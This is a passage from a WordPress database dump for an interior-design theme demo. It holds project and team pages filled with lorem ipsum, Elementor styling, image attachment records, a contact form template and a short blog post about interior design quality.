quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Greater commercial','','publish','open','closed','','greater-commercial','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&#038;p=684',0,'ova_projects','',0),(710,1,'2022-06-14 07:23:43','2022-06-14 07:23:43','','about-get-to-know-us','','inherit','open','closed','','about-get-to-know-us','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',38,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg',0,'attachment','image/jpeg',0),(711,1,'2022-06-14 07:24:01','2022-06-14 07:24:01','','background-about-section1','','inherit','open','closed','','background-about-section1','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',38,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/background-about-section1.png',0,'attachment','image/png',0),(718,1,'2022-06-14 07:30:18','2022-06-14 07:30:18','','avatar','','inherit','open','closed','','avatar','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',38,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg',0,'attachment','image/jpeg',0),(752,1,'2022-06-14 07:53:26','2022-06-14 07:53:26','','01','','inherit','open','closed','','01','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',38,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/01.png',0,'attachment','image/png',0),(753,1,'2022-06-14 07:53:39','2022-06-14 07:53:39','','02','','inherit','open','closed','','02','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',38,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/02.png',0,'attachment','image/png',0),(754,1,'2022-06-14 07:53:48','2022-06-14 07:53:48','','03','','inherit','open','closed','','03','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',38,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/03.png',0,'attachment','image/png',0),(755,1,'2022-06-14 07:53:58','2022-06-14 07:53:58','','04','','inherit','open','closed','','04','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',38,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/04.png',0,'attachment','image/png',0),(756,1,'2022-06-14 07:54:10','2022-06-14 07:54:10','','06','','inherit','open','closed','','06','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',38,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/06.png',0,'attachment','image/png',0),(757,1,'2022-06-14 07:54:31','2022-06-14 07:54:31','','05.jpg','','inherit','open','closed','','05-jpg','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',38,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/05.jpg.png',0,'attachment','image/png',0),(773,1,'2023-05-25 10:22:05','2022-06-14 08:00:26',' ','','','publish','closed','closed','','773','','','2023-05-25 10:22:05','2023-05-25 10:22:05','',0,'https://demo.ovatheme.com/retirio/?p=773',7,'nav_menu_item','',0),(774,1,'2022-11-14 04:44:01','2022-06-14 08:00:26',' ','','','publish','closed','closed','','774','','','2022-11-14 04:44:01','2022-11-14 04:44:01','',0,'https://demo.ovatheme.com/retirio/?p=774',2,'nav_menu_item','',0),(775,1,'2022-06-14 08:02:00','2022-06-14 08:02:00','','Blog','','publish','closed','closed','','blog','','','2022-06-14 08:02:00','2022-06-14 08:02:00','',0,'https://demo.ovatheme.com/retirio/?page_id=775',0,'page','',0),(800,1,'2022-06-14 08:13:59','2022-06-14 08:13:59','','bg','','inherit','open','closed','','bg','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',40,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/bg.png',0,'attachment','image/png',0),(884,1,'2022-06-14 09:31:10','2022-06-14 09:31:10','<div class=\"ova-wpcf7 contact-form \">\r\n    \r\n    <div class=\"ova-text\">[text* your-name class:name  placeholder \"Your name\"]</div>\r\n    <div class=\"ova-email\">[email* your-email class:email  placeholder \"Email address\"] </div>\r\n    <div class=\"ova-phone\">[tel* tel-780 class:phone placeholder \"Phone Number\"] </div>\r\n    <div class=\"ova-textarea\">\r\n       [textarea your-message class:message  placeholder \"Write a message\"]\r\n    </div>\r\n    <div class=\"ova-submit\">\r\n      <button type=\"submit\" class=\"wpcf7-form-control has-spinner wpcf7-submit\"><span>Send a Message</span></button>\r\n    </div>\r\n</div>\n1\n[_site_title] \"[your-name]\"\n[_site_title] <contact@ovatheme.com>\n[_site_admin_email]\nFrom: [your-name] <[your-email]>\r\nSubject: [your-subject]\r\n\r\nMessage Body:\r\nTel: [tel-780]\r\n[your-message]\r\n\r\n-- \r\nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\nReply-To: [your-email]\n\n\n\n1\n[_site_title] \"[your-name]\"\n[_site_title] <contact@ovatheme.com>\n[your-email]\nMessage Body:\r\nTel: [tel-780]\r\n[your-message]\r\n\r\n-- \r\nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\nReply-To: [_site_admin_email]\n\n\n\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nThe field is required.\nThe field is too long.\nThe field is too short.\nThere was an unknown error uploading the file.\nYou are not allowed to upload files of this type.\nThe file is too big.\nThere was an error uploading the file.\nThe date format is incorrect.\nThe date is before the earliest one allowed.\nThe date is after the latest one allowed.\nThe number format is invalid.\nThe number is smaller than the minimum allowed.\nThe number is larger than the maximum allowed.\nThe answer to the quiz is incorrect.\nThe e-mail address entered is invalid.\nThe URL is invalid.\nThe telephone number is invalid.','Contact page','','publish','closed','closed','','contact-page','','','2022-06-14 09:31:10','2022-06-14 09:31:10','',0,'https://demo.ovatheme.com/retirio/?post_type=wpcf7_contact_form&amp;p=884',0,'wpcf7_contact_form','',0),(921,1,'2022-06-14 10:07:52','2022-06-14 10:07:52','','team-01','','inherit','open','closed','','team-01','','','2022-06-14 10:07:52','2022-06-14 10:07:52','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg',0,'attachment','image/jpeg',0),(922,1,'2022-06-14 10:07:52','2022-06-14 10:07:52','','team-02','','inherit','open','closed','','team-02','','','2022-06-14 10:07:52','2022-06-14 10:07:52','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg',0,'attachment','image/jpeg',0),(923,1,'2022-06-14 10:07:53','2022-06-14 10:07:53','','team-03','','inherit','open','closed','','team-03','','','2022-06-14 10:07:53','2022-06-14 10:07:53','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg',0,'attachment','image/jpeg',0),(924,1,'2022-06-14 10:07:53','2022-06-14 10:07:53','','team-04','','inherit','open','closed','','team-04','','','2022-06-14 10:07:53','2022-06-14 10:07:53','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg',0,'attachment','image/jpeg',0),(925,1,'2022-06-14 10:07:53','2022-06-14 10:07:53','','team-05','','inherit','open','closed','','team-05','','','2022-06-14 10:07:53','2022-06-14 10:07:53','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg',0,'attachment','image/jpeg',0),(926,1,'2022-06-14 10:07:54','2022-06-14 10:07:54','','team-06','','inherit','open','closed','','team-06','','','2022-06-14 10:07:54','2022-06-14 10:07:54','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg',0,'attachment','image/jpeg',0),(930,1,'2022-06-14 10:13:53','2022-06-14 10:13:53','<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Personal experience</h2>		\n		<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.</p>		\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n				Interior\n									40%\n			<section>\n																																	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Kevin martin\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Kevin martin</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Jessica brown </p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Mike hardson\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Mike hardson</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n			</section>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"370\" height=\"271\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-planning-stage.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-planning-stage.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Planning stage</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-flexible-output.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-flexible-output.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Flexible output</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n					<ul>\n							<li>\n										Complete italian wooden works\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-new-material.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-new-material.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>New material</h2>		\n		There are many variations of passages of psum available but the majority have suffered.		\n					<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										  Premium quality of full apartment\n									</li>\n						</ul>','Aleesha brown','','publish','closed','closed','','aleesha-brown','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?post_type=team&#038;p=930',0,'team','',0),(937,1,'2022-06-14 10:22:37','2022-06-14 10:22:37','','bg-lines-team','','inherit','open','closed','','bg-lines-team','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/bg-lines-team.png',0,'attachment','image/png',0),(984,1,'2022-06-15 01:33:47','2022-06-15 01:33:47','','bg-section-services','','inherit','open','closed','','bg-section-services','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/bg-section-services.png',0,'attachment','image/png',0),(1037,1,'2022-06-15 03:12:49','2022-06-15 03:12:49','<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Personal experience</h2>		\n		<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.</p>		\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}</style>			\n				Archirecture\n									85%\n				Designing\n									60%\n				Interior\n									40%\n			<section>\n																																	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Kevin martin\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Kevin martin</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Jessica brown </p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Mike hardson\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Mike hardson</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n			</section>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"370\" height=\"271\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-planning-stage.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-planning-stage.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Planning stage</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-flexible-output.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-flexible-output.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Flexible output</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n					<ul>\n							<li>\n										Complete italian wooden works\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-new-material.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-new-material.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>New material</h2>		\n		There are many variations of passages of psum available but the majority have suffered.		\n					<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										  Premium quality of full apartment\n									</li>\n						</ul>','Kevin martin','','publish','closed','closed','','kevin-martin','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?post_type=team&#038;p=1037',0,'team','',0),(1090,3,'2023-09-24 15:00:21','2023-09-24 15:00:21','<!-- wp:paragraph -->\n<p>Designing interior spaces that truly make a difference in people\'s lives is at the heart of what we do. At Bauhaus Living, we are committed to creating high-quality, effective, and inspiring built environments that leave a lasting impact. In this article, we\'ll explore what it means to craft spaces that elevate the human experience.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>Quality Matters</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Quality is a cornerstone of our approach to interior design. When we talk about quality in the context of built spaces, we are referring to the craftsmanship, materials, and attention to detail that go into every project. High-quality design and execution result in spaces that not only look stunning but also stand the test of time.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We source the finest materials and work with skilled artisans who share our commitment to excellence. This dedication to quality ensures that your interior spaces will not only be aesthetically pleasing but also durable and functional.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>Effectiveness through Functionality</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Effective interior design goes beyond aesthetics; it\'s about creating spaces that work seamlessly for their intended purposes. Whether it\'s a home, office, retail store, or hospitality venue, we understand the unique needs and goals of each project. Our designs are tailored to enhance functionality and flow, optimizing the use of space to meet the practical requirements of our clients.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We believe that effective design should make daily routines more efficient, improve productivity in the workplace, and enhance the overall experience of a space. Our team takes the time to understand your vision and objectives, ensuring that our designs not only meet but exceed your expectations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>Inspiration in Every Detail</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Inspiration is a powerful force in design. An inspiring space has the ability to uplift, motivate, and captivate. It\'s where creativity flourishes, and ideas come to life. Our interior designs are carefully curated to inspire, with attention paid to every detail.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We believe that an inspiring built environment can positively impact the people who inhabit it. Whether it\'s through the use of color, texture, lighting, or unique design elements, our goal is to create spaces that leave a lasting impression and encourage creativity and innovation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>Collaboration and Vision</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>The journey to creating high-quality, effective, and inspiring built spaces begins with collaboration. We work closely with our clients to understand their vision, preferences, and goals. Our team of experienced designers combines their expertise with your vision to bring concepts to reality.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We also collaborate with architects, contractors, and other professionals to ensure that every aspect of the project aligns with our commitment to quality, functionality, and inspiration.</p>\n<!-- /wp:paragraph -->','High Quality, Effective & Inspiring Built Space','Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable','publish','open','open','','high-quality-effective-inspiring-built-space','','','2023-09-25 10:34:53','2023-09-25 10:34:53','',0,'https://demo.ovatheme.com/retirio/?p=1090',0,'post','',0),(1100,1,'2022-06-15 07:23:20','2022-06-15 07:23:20','<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Personal experience</h2>		\n		<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.</p>		\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info 